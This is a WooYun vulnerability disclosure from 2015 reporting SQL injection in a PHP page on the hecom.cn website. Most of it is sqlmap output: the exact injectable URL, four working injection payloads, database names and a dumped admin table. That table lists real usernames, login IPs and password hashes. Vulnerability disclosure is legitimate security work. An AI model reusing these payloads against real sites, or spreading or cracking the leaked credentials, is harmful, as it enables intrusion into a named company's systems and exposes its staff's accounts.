当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128595

漏洞标题:图搜天下某处SQL注入

相关厂商:图搜天下(北京)科技有限公司

漏洞作者: 路人甲

提交时间:2015-07-23 11:56

修复时间:2015-07-28 11:58

公开时间:2015-07-28 11:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

和创科技(原图搜天下)【官网】红圈营销-排名第一的企业级移动销售云服务平台

详细说明:

注入点:http://www.hecom.cn:80/phone/culdetail.php?id=199
参数 id 可注入

0.png


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 211 HTTP(s) req
uests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: http://www.hecom.cn:80/phone/culdetail.php?id=-5435 OR 9238=9238#21
=6 AND 526=526
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: http://www.hecom.cn:80/phone/culdetail.php?id=-6779 OR 1 GROUP BY C
ONCAT(0x71706b7671,(SELECT (CASE WHEN (1297=1297) THEN 1 ELSE 0 END)),0x717a6b6a
71,FLOOR(RAND(0)*2)) HAVING MIN(0)#21=6 AND 526=526
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (comment)
Payload: http://www.hecom.cn:80/phone/culdetail.php?id=199 AND 3 AND SLEEP(5
)#21=6 AND 526=526
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: http://www.hecom.cn:80/phone/culdetail.php?id=-7488 UNION ALL SELEC
T NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170
6b7671,0x615979776d5344594c75,0x717a6b6a71)-- 21=6 AND 526=526
---
[11:05:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0.12
[11:05:59] [INFO] fetching database names
[11:05:59] [INFO] the SQL query used returns 2 entries
[11:05:59] [INFO] retrieved: information_schema
[11:05:59] [INFO] retrieved: websitenew
available databases [2]:
[*] information_schema
[*] websitenew
[11:06:00] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.hecom.cn'
[*] shutting down at 11:06:00


1.png


do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: websitenew
Table: wurenet_admin
[5 entries]
+----+-----+-------+------------+---------------+---------------+------------+--
--------+----------------------------------+
| id | vip | state | addtime | loginip | username | datetime | i
sdelete | password |
+----+-----+-------+------------+---------------+---------------+------------+--
--------+----------------------------------+
| 9 | 0 | 0 | 1393228841 | 127.0.0.2 | adminhc | 1405163326 | 0
| f65f6c0da1882bb500bcdd38b450036b |
| 14 | 0 | 0 | 1404559585 | 127.0.0.2 | huahao | 1404612664 | 0
| 1dd404921834e8226cd1d1051170586e |
| 28 | 3 | 0 | 1435052599 | 218.240.51.99 | yanwannan | 1435052599 | 0
| 1b8abe17b17c8fb021085040681466da |
| 29 | 3 | 0 | 1435052618 | 218.240.51.99 | zhangyajun | 1435052618 | 0
| ab765510737d2bbe55fa6b7681438196 |
| 30 | 3 | 0 | 1435280793 | 218.240.51.99 | renshizhaopin | 1435280793 | 0
| 6193645877a650211910855d9135fb62 |
+----+-----+-------+------------+---------------+---------------+------------+--
--------+----------------------------------+
[11:09:30] [INFO] table 'websitenew.wurenet_admin' dumped to CSV file 'C:\Users\
Administrator\.sqlmap\output\www.hecom.cn\dump\websitenew\wurenet_admin.csv'
[11:09:30] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.hecom.cn'
[*] shutting down at 11:09:30


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-28 11:58

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无